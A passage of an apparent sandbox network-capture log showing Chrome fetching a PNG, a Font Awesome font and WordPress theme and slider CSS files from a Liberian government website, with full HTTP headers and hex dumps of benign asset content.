                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:46 UTC358INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:46 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 09:26:19 GMT
                                                                                                                        ETag: "44-60e94060daa93"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 68
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:46 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:46 UTC68INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0b 49 44 41 54 18 57 63 60 60 00 00 00 03 00 01 68 26 59 0d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                        Data Ascii: PNGIHDRIDATWc``h&YIENDB`


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        18192.168.2.74978569.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:46 UTC672OUTGET /wp-content/themes/betheme/fonts/fontawesome/fa-solid-900.woff2 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                        Referer: https://www.lpb.gov.lr/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.7
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC364INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "139ac-60e9383bd07f8"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 80300
                                                                                                                        Cache-Control: max-age=172800
                                                                                                                        Expires: Sun, 12 Jan 2025 13:54:47 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: font/woff2
                                                                                                                        2025-01-10 13:54:47 UTC7828INData Raw: 77 4f 46 32 00 01 00 00 00 01 39 ac 00 0d 00 00 00 03 1e ec 00 01 39 52 01 4b 85 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 99 4e 11 08 0a 8a f4 60 88 ce 40 01 36 02 24 03 9f 30 0b 9f 34 00 04 20 05 8a 2b 07 e2 2e 5b 32 7b 92 01 32 ef a7 51 32 be ad 0a 4c 34 6e e4 2b a6 9b 3b 05 ba 0d a0 e6 45 aa 8c 74 ae 84 3b de dd 4a e4 d4 10 71 65 ff ff ff ff bf ef 68 88 39 a5 b3 75 b6 63 c7 e9 47 52 fa d1 01 85 75 0c d8 43 92 21 db 9d 13 a5 5c 86 5a a9 96 06 1f d1 bd d0 38 95 55 c1 3a 61 83 ba a5 15 09 eb dd 83 35 2f 7d d9 af 3a 15 e3 91 0e 3c 3b 76 89 9d 33 5a 45 a2 34 e6 b1 94 f0 63 68 7a f0 c5 14 1f 59 2c 16 4e 23 c6 3a 96 80 21 f8 1c 7e 89 52 51 6b c5 62 96 a0 3e 4c c3 c0 4f c6 95 14 28 92 21 1a 26 14 fd 08 7f
                                                                                                                        Data Ascii: wOF299RK`?FFTM`N`@6$04 +.[2{2Q2L4n+;Et;Jqeh9ucGRuC!\Z8U:a5/}:<;v3ZE4chzY,N#:!~RQkb>LO(!&
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: d4 6a c3 55 51 48 f6 f5 da 53 6a e9 2b e5 ee 79 1f 85 ce 23 4a 49 2b e9 4f 0a 8e 0c 7a ea 63 5a 8f de aa 68 b5 df a4 6b dc 89 5f 7f 9b 49 ab 04 71 1a 7c 9a a5 74 63 34 84 4f 20 f2 98 98 b9 f0 64 cf 81 b6 ed 37 a4 b9 dc 7c e7 9c 49 6a 2b 8d 17 7c a3 e4 ab 71 99 54 0f 92 c7 18 27 56 44 63 da 75 7a f6 a5 70 a4 3e f6 17 ec 23 a9 09 20 9c 6b d7 e5 4a f9 33 c8 f3 80 23 0d 86 b2 a6 ec a3 c7 f0 d1 73 d1 c4 cd 06 44 9d f2 e6 4e 72 64 a4 13 a6 04 c8 5b d2 56 cc aa 84 76 13 68 51 db b2 7a de 37 e4 99 e2 83 a2 13 0f bb 05 55 23 f4 c2 a5 ee 15 62 ab be 4d 46 01 52 db bd fc cd 7b 94 c7 33 1d 94 0c e2 06 16 c4 85 f5 ef 06 cc 56 65 16 25 3d ba c1 23 6d 5f bc 9c bb 55 ed f1 a5 ea 0d 94 d0 22 99 0f c8 f0 57 5c 92 b8 a9 53 ca 43 ed 23 9d 14 18 64 26 65 89 33 a1 80 af 02 c0
                                                                                                                        Data Ascii: jUQHSj+y#JI+OzcZhk_Iq|tc4O d7|Ij+|qT'VDcuzp># kJ3#sDNrd[VvhQz7U#bMFR{3Ve%=#m_U"W\SC#d&e3
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 68 92 80 5a d9 31 7b f0 f1 22 de 1e 44 28 2c 23 17 c6 22 9f b3 50 07 d3 54 83 e2 2d 96 8c 11 dd 63 15 64 70 95 0a 34 ec 0a 29 ba cc ea 8c c1 61 a5 bc 48 2e bb 6a e2 87 7f 32 b4 31 3b f8 5e cb c2 13 a2 24 96 eb 1b a4 8f 9a 98 77 0a 6e f4 b3 f5 4c 17 7d b9 5a f3 8a be b0 36 f3 fe fd 45 e0 96 b4 3d b2 2d 57 a4 12 c7 58 61 77 fb 9d 3a e9 e9 0b 21 a7 c5 2c 3f 68 62 8d 33 81 6a 6b 92 c9 9a ca fe f7 26 60 7d 07 27 c4 0e 85 fc 09 bd 2f 1e 3e bb b8 27 8e 3a b7 ff 4f 60 9b a4 67 e5 e6 e5 d6 d2 85 bd 72 14 20 9f a3 f8 cb 61 64 bc 78 4b 89 8b df 7f de cc b1 6e 39 1a 38 3a 39 fa ac 1f 7f c8 56 c1 74 91 a2 a1 d7 1c ae 41 c9 85 6a 48 d1 3d 6b a6 47 67 a7 7a 38 58 c6 56 0e 77 dc e3 56 37 10 81 f1 13 d5 c9 32 f7 23 90 37 ca c4 2e 47 37 4f 1b 78 51 97 e0 3e 9d 8d b5 02 ec
                                                                                                                        Data Ascii: hZ1{"D(,#"PT-cdp4)aH.j21;^$wnL}Z6E=-WXaw:!,?hb3jk&`}'/>':O`gr adxKn98:9VtAjH=kGgz8XVwV72#7.G7OxQ>
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 23 a4 33 38 c0 3c b4 71 7c 52 06 63 42 d0 36 d2 22 e4 bf 4b 73 9c 45 b7 5a 1d cd a9 32 f7 5a 29 03 e5 e8 08 cb 94 47 7f a7 e7 29 70 bb 7a a4 7a 70 f1 40 63 e8 3d a2 05 63 91 22 d2 6f 6d d7 96 0e 2f 57 9f 9d 2c 1f 5f cd 97 4f ae 1d d5 b2 46 07 98 dc f5 c5 58 44 bc 7f 30 4b f2 e7 e4 ab d5 de 56 9a fd 6f d5 1a 4a 68 eb ee 6e f6 1d ad b5 e0 5d b5 ad 75 d0 6f e0 64 21 6b d8 63 cd cb e5 5c a4 44 1f c1 54 25 fd db 65 f3 bf d4 7d a5 ab 6a 19 35 2b a3 e2 51 2f 7d e7 ac d6 9e 31 83 d4 e1 d9 14 97 b4 41 ad 8e a1 67 11 69 bb ed 8a 64 81 74 67 00 78 8a d8 0f a8 df 2c a2 c9 4a 1b 3d 02 0c 13 d5 6a 09 f1 5b 70 69 5e 16 6e db eb a9 24 d6 5e 87 13 27 d8 a8 c0 5a c2 0c 4a 03 da ac a2 44 c4 1d 22 57 1a 45 b9 9e 17 47 a6 aa eb c0 38 49 ec 19 39 53 58 16 37 2b b1 c4 8e b4 f2
                                                                                                                        Data Ascii: #38<q|RcB6"KsEZ2Z)G)pzzp@c=c"om/W,_OFXD0KVoJhn]uod!kc\DT%e}j5+Q/}1Agidtgx,J=j[pi^n$^'ZJD"WEG8I9SX7+
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 14 6a 65 7c fb 37 14 fc 5e 8d 2f 97 89 af 2d 5b 92 dd 8b 08 80 30 45 42 e4 fe 59 ce 27 64 d3 96 05 23 06 e8 0b 14 70 3b e8 f7 73 a6 5b f3 dc 02 c2 ec 8f 04 92 91 13 70 0c b1 dd 1a ec 26 11 5c e7 25 61 eb 1a 04 c7 0f 6e 3c 1d cc 32 9a 29 2a 5a 18 d5 86 aa 6b d7 e4 d4 e2 97 40 ba 13 ea 2f 40 0a b5 42 8e b3 18 c1 11 bb d4 46 b6 8c f7 e2 f0 5f 46 7d 55 95 de df eb 73 84 ff 1d 49 cf 05 ef 31 7b b1 cf 0c 47 57 4a d5 b2 10 f4 ca 29 2d 98 fb eb 96 d9 e5 e8 12 9d e2 4d f3 97 72 40 a9 a9 d1 50 2e 09 c2 82 13 e2 3f d3 f0 09 04 e6 84 00 07 61 f2 27 fd 17 fa 0f 2b e2 66 40 9c 1d 04 64 9f 77 99 ac aa 78 85 24 3b f8 ea 10 5b c3 36 9c e3 89 c1 85 ec 54 a6 83 d8 1d 5c 15 66 f5 23 f5 44 d8 8e 09 30 c3 90 37 e7 42 94 59 10 35 4c 9d d5 3c 9a af b2 43 06 2e d7 9a 6a 46 27 b3
                                                                                                                        Data Ascii: je|7^/-[0EBY'd#p;s[p&\%an<2)*Zk@/@BF_F}UsI1{GWJ)-Mr@P.?a'+f@dwx$;[6T\f#D07BY5L<C.jF'
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: e9 ea 8a 5f 38 a2 31 39 bf ac e8 6c 5d 5e 53 fb b8 fc 20 12 dd fd 88 a2 82 84 c1 69 05 a4 e8 e0 6b 9f 64 76 03 ea 8e 6d ce c9 a2 39 37 e9 2c a3 5e 7c 52 15 d7 1b a7 9a dc 11 e2 27 9d ea d2 97 85 56 9a f5 e4 49 62 b2 f2 63 80 57 44 31 37 47 c6 eb 4c 56 6e c0 e2 c9 3e 8e cb a5 15 d7 7f 0d f0 3f 94 49 54 0c ba 52 27 c3 5e 64 f1 1b fa 1b f8 59 f1 b9 ea fa 98 e6 e8 66 f8 e5 40 e3 d1 49 43 0d 92 c6 4a af e9 b6 a8 ae 0f b2 19 fb 12 03 9f 22 b8 e8 4f fb 29 b1 69 30 9f d1 73 60 09 a1 98 fe 94 ce 19 09 2c 80 3a 09 40 81 75 91 24 09 2a 0d 99 69 a3 2a f6 6e 33 53 4a 35 c5 cc ac 0a e8 29 6a b7 92 79 a5 b5 d8 71 0d ca 6a 30 2c 50 ea f2 a3 cc de 59 f6 cd 9a 35 9d b7 8b 46 83 7c ca 6c 9e 12 4e cd 84 48 4d 5f df 5b 7f 9c 68 fe 02 9d ae 56 a9 00 76 cf 4b 77 9e 26 73 ce b3
                                                                                                                        Data Ascii: _819l]^S ikdvm97,^|R'VIbcWD17GLVn>?ITR'^dYf@ICJ"O)i0s`,:@u$*i*n3SJ5)jyqj0,PY5F|lNHM_[hVvKw&s
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 3b a5 66 8a 29 31 a5 cc ab 77 1b 27 78 c6 e1 bf 0e a0 fe c3 a2 80 7f fc aa eb a1 54 70 4e f8 eb e6 00 be 1b 8e c3 de ec a0 9b 33 5a ec 75 21 a0 63 26 1c 90 a7 9c 2f f0 5c ac d8 48 19 43 0f 02 27 43 55 b2 a9 1c 5f a9 0c 74 04 32 eb ed b1 fd 90 2a e3 d1 bc 48 f5 e3 f8 59 a6 cc 73 8b 0d 7a 14 c4 ff a5 8e 9c f7 28 43 35 29 f4 db bf 58 ae a2 b1 61 f0 b5 35 4b 0a 14 ea 39 ad 9e 19 d0 c9 48 7e 62 6a b0 3b 0d 7b a6 cc 2d c9 6a 4d 0c f2 4b 8d f4 84 c2 66 a4 22 66 a5 6a 8e a2 e0 a2 db b9 89 c1 56 82 ee 20 b8 ab f4 a4 02 26 54 75 d3 02 a8 b1 c0 6f f2 c4 01 a4 b0 77 f1 d0 03 c1 ca 10 1c f3 15 c3 98 fe 3e d3 1d d1 d8 16 dc 78 ed a9 38 1c 97 aa 03 4f 30 fa 23 84 cd e9 96 5a 3e 17 80 3a 5c 73 eb 62 4e d9 e1 82 9b 29 e9 81 de 7f 57 de 87 ce 0a cb 35 bc 32 8c c0 a5 79 af
                                                                                                                        Data Ascii: ;f)1w'xTpN3Zu!c&/\HC'CU_t2*HYsz(C5)Xa5K9H~bj;{-jMKf"fjV &Tuow>x8O0#Z>:\sbN)W52y
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 5b b7 90 ba a5 87 57 4f f6 88 5b e6 7f af 75 0e 32 f3 cf 4e ee 01 99 90 fe 84 06 3c 0a e8 6b 32 d0 54 35 d2 e1 d6 bb 44 01 22 e7 66 d8 1d 51 ec e2 db 4c 21 9a 2f 1c 06 41 40 92 30 9e 83 39 d3 31 8b f6 d0 a1 98 dc 2a 7a d4 b3 6f 5f 16 d5 9c f5 ba f8 33 85 49 0f 4f b7 14 7b 25 6a 8a 76 18 72 19 50 87 57 14 06 db 29 ff 3b b7 79 39 62 bf 51 d4 57 f5 4d 24 f7 3a a2 ed f8 e1 94 d8 5e b2 2e a0 e3 86 88 06 8f 4b 1f 4b f5 c5 d3 ac 2a 5f d6 e9 8b 46 77 c9 ba 5a d8 44 e1 77 92 d3 2c df ea c0 ee 8b d5 be 2c ad 10 ff 9d 5b ad 88 27 bb 89 bb 54 12 4e 2f 9a 65 1e 08 f2 26 58 fd 64 f0 fc 1a 36 7b 40 80 fa 79 37 96 c8 78 f8 98 48 32 01 e8 86 66 7a 50 d0 e9 3e 5f 17 47 6e 28 fa b9 f8 a0 aa 53 17 78 fa c5 12 5e b6 ef 36 74 6a ae d1 25 3e dd 8e 96 46 67 02 59 f0 62 17 96 73
                                                                                                                        Data Ascii: [WO[u2N<k2T5D"fQL!/A@091*zo_3IO{%jvrPW);y9bQWM$:^.KK*_FwZDw,,['TN/e&Xd6{@y7xH2fzP>_Gn(Sx^6tj%>FgYbs
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 29 d8 85 4b b7 9a 98 16 ec af 2c cc 78 2e 38 67 da d7 11 70 19 bb ce 67 b1 99 ea fb 29 8b 2b 72 8e 77 2f 9f 0d 01 73 2f 7e 71 37 a4 d3 67 63 3d e2 af fe 03 78 82 7a 33 62 c0 d5 3b 01 31 ae b3 10 f5 d6 7b ba 99 13 72 52 f1 f0 64 3f f2 69 7d 36 1c 51 84 31 d6 99 f6 6a 57 50 44 b7 d4 c6 6a 7b 6d e6 7d 20 4f 08 d4 60 30 38 00 7b 8e 9c 91 41 81 6f a3 94 b0 01 d5 5d 26 51 da 43 4a 6d 68 80 fc b9 d6 51 71 7a 06 32 b2 2c 22 d0 6b de f5 b8 04 cc f9 24 dc 7c bd ee 46 ad 7a 4b fc 00 d7 5b 91 c6 47 69 dd e9 cd 4d 92 60 72 4c d7 08 43 d4 5e 04 1f d7 2c a4 17 64 cb d6 f3 5c 1f 5e 26 91 12 ee 99 64 c3 fd fd 2f 78 55 db ab e1 b2 95 e3 44 94 7c b0 46 3c 30 7c 4b 26 a8 35 05 ac ba 9a 0a c4 3c ad 5f 15 21 41 2e 5f 35 43 c9 f6 ea dc c6 cc 8f 24 2e 27 6b 57 a0 62 6a 65 b2 ce
                                                                                                                        Data Ascii: )K,x.8gpg)+rw/s/~q7gc=xz3b;1{rRd?i}6Q1jWPDj{m} O`08{Ao]&QCJmhQqz2,"k$|FzK[GiM`rLC^,d\^&d/xUD|F<0|K&5<_!A._5C$.'kWbje
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: d0 c3 89 60 6a ad d2 40 c7 27 67 37 6d da 24 82 ab 70 7c cc 94 e5 82 60 5d 53 4a a6 67 60 5d 75 5d 60 1c 77 08 ce c8 dc c7 7b 80 5f 3b 35 8c cb 9a 86 cf cf b1 94 a0 df 84 bf 05 51 62 8f 5f 28 41 23 b0 7e 54 ac 94 4b ea fc 9d 0d 2b 6c f0 53 3e 03 51 3a ee b8 55 d2 78 1e 48 66 24 a3 e3 33 4b 28 6f e6 e1 d2 ad 08 0c d8 3c 3b 37 13 3b bc 75 cc 87 cf b8 7b 37 89 90 3b cb 18 13 4e 27 2d b9 79 fd ce 28 ad a7 e3 8e 9a 76 fa fe 8a a2 8c 5c 19 ec 27 4c 16 7b 56 7c 56 a8 47 aa 92 23 80 ce 40 50 d5 5b 29 eb 1a da 31 31 cc 13 85 2a 78 c3 13 e0 6e 7b d3 e4 a7 a9 a0 cf 4d 59 1a 04 65 26 3f ff 53 2f ea 68 b7 25 75 8c c6 dc 67 a5 ce ce 22 8f cc 60 d1 16 f7 2c fd 5d e3 f2 50 aa ba f3 70 d6 e2 50 ed 84 e8 dd 7f 18 20 07 15 4f ce c9 fe ec f4 44 81 0e e1 13 f1 94 c8 17 7f 09
                                                                                                                        Data Ascii: `j@'g7m$p|`]SJg`]u]`w{_;5Qb_(A#~TK+lS>Q:UxHf$3K(o<;7;u{7;N'-y(v\'L{V|VG#@P[)11*xn{MYe&?S/h%ug"`,]PpP OD


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        19192.168.2.74978769.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:46 UTC586OUTGET /wp-content/uploads/so-css/so-css-betheme.css?ver=1707433542 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC357INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Thu, 08 Feb 2024 23:05:42 GMT
                                                                                                                        ETag: "39-610e6d9cc7b8c"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 57
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:47 UTC57INData Raw: 62 6f 64 79 3a 6e 6f 74 28 2e 74 65 6d 70 6c 61 74 65 2d 73 6c 69 64 65 72 29 20 23 48 65 61 64 65 72 20 7b 0d 0a 20 20 68 65 69 67 68 74 3a 20 33 35 30 70 78 3b 0d 0a 7d
                                                                                                                        Data Ascii: body:not(.template-slider) #Header { height: 350px;}


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        20192.168.2.74978669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:46 UTC583OUTGET /wp-content/uploads/betheme/css/post-2.css?ver=1736517284 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC360INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Mon, 05 Feb 2024 11:34:07 GMT
                                                                                                                        ETag: "a04-610a0d6fc99ef"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2564
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:47 UTC2564INData Raw: 2e 6d 63 62 2d 73 65 63 74 69 6f 6e 2d 32 61 33 63 35 64 36 37 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 39 70 78 3b 7d 2e 6d 63 62 2d 73 65 63 74 69 6f 6e 20 2e 6d 63 62 2d 77 72 61 70 20 2e 6d 63 62 2d 69 74 65 6d 2d 79 65 7a 6f 6d 68 30 7a 63 20 2e 63 6f 6c 75 6d 6e 5f 61 74 74 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 7d 2e 6d 63 62 2d 73 65 63 74 69 6f 6e 20 2e 6d 63 62 2d 77 72 61 70 20 2e 6d 63 62 2d 69 74 65 6d 2d 30 65 63 63 71 65 6c 32 72 20 2e 63 6f 6c 75 6d 6e 5f 61 74 74 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 3b 66 6f 6e
                                                                                                                        Data Ascii: .mcb-section-2a3c5d67d{margin-bottom:-19px;}.mcb-section .mcb-wrap .mcb-item-yezomh0zc .column_attr{text-align:center;color:#FFFFFF;font-size:40px;font-weight:500;}.mcb-section .mcb-wrap .mcb-item-0eccqel2r .column_attr{text-align:center;color:#FFFFFF;fon


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        21192.168.2.74978869.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:46 UTC592OUTGET /wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.13 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:47 UTC362INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 09:26:19 GMT
                                                                                                                        ETag: "e926-60e94060a0108"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 59686
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:47 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/css
                                                                                                                        2025-01-10 13:54:47 UTC7830INData Raw: 2f 2a 20 46 49 58 20 46 4f 52 20 57 4f 52 44 50 52 45 53 53 27 73 20 43 52 41 5a 59 20 3c 70 3e 20 54 41 47 20 41 4e 4f 4d 41 4c 59 20 2a 2f 0d 0a 2e 72 73 2d 70 2d 77 70 2d 66 69 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 20 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0d 0a 0d 0a 2f 2a 20 4e 45 57 20 5a 2d 49 4e 44 45 58 20 46 49 58 2a 2f 0d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 74 68 65 6d 65 70 75 6e 63 68 2d 72 65 76 73 6c 69 64 65 72 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 20 7d 0d 0a 0d 0a 2f 2a 20 46 49 58 20 46 4f 52 20 51 55 49 43 4b 20 4c 4f 41 44 49 4e 47 20 4f 46 20 53 4c 49 44 45 52 20
                                                                                                                        Data Ascii: /* FIX FOR WORDPRESS's CRAZY <p> TAG ANOMALY */.rs-p-wp-fix { display: none !important; margin: 0 !important; height: 0px !important; }/* NEW Z-INDEX FIX*/.wp-block-themepunch-revslider { position: relative }/* FIX FOR QUICK LOADING OF SLIDER
                                                                                                                        2025-01-10 13:54:47 UTC8000INData Raw: 72 65 76 69 63 6f 6e 2d 6c 65 66 74 2d 6f 70 65 6e 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 32 65 27 3b 20 7d 20 2f 2a 20 27 ee a0 ae 27 20 2a 2f 0d 0a 2e 72 65 76 69 63 6f 6e 2d 6c 65 66 74 2d 6f 70 65 6e 2d 32 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 32 63 27 3b 20 7d 20 2f 2a 20 27 ee a0 ac 27 20 2a 2f 0d 0a 2e 72 65 76 69 63 6f 6e 2d 72 69 67 68 74 2d 6f 70 65 6e 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 32 66 27 3b 20 7d 20 2f 2a 20 27 ee a0 af 27 20 2a 2f 0d 0a 2e 72 65 76 69 63 6f 6e 2d 72 69 67 68 74 2d 6f 70 65 6e 2d 32 3a 62 65 66 6f 72 65 20 7b 20 63 6f 6e 74 65 6e 74 3a 20 27 5c 65 38 32 64 27 3b 20 7d 20 2f 2a 20
                                                                                                                        Data Ascii: revicon-left-open-outline:before { content: '\e82e'; } /* '' */.revicon-left-open-2:before { content: '\e82c'; } /* '' */.revicon-right-open-outline:before { content: '\e82f'; } /* '' */.revicon-right-open-2:before { content: '\e82d'; } /*
